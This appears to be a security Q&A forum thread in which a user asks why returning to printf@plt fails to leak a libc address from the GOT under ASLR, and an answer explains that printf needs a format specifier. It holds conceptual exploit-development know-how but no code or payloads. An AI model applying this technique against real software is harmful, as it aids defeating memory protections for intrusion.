2

I have a small binary compiled as non-pie, but ASLR is enabled, so the shared libraries are randomized. My plan was to leak any libc address from GOT via returning to plt, but the only useful plt-stub i have is a printf. Previously i wrote a working exploit with this method, when i could use puts, but in this case the only output i get after returning to printf@plt is an empty string.

I couldn't find out the reason of this behavior so far; why printf acts like this? Is it even possible to leak an address this way?

awerv
  • 21
  • 1
  • 3

1 Answers1

1

Yes, I think it's possible to leak an address using printf. In puts you only need to pass one argument to the function, the string you want to write to stdout, and in a case of a buffer-overflow the address of the function you want to leak. In printf you also need to pass a format specifier. There's a write-up here that demonstrates exactly that.

game0ver
  • 585
  • 4
  • 12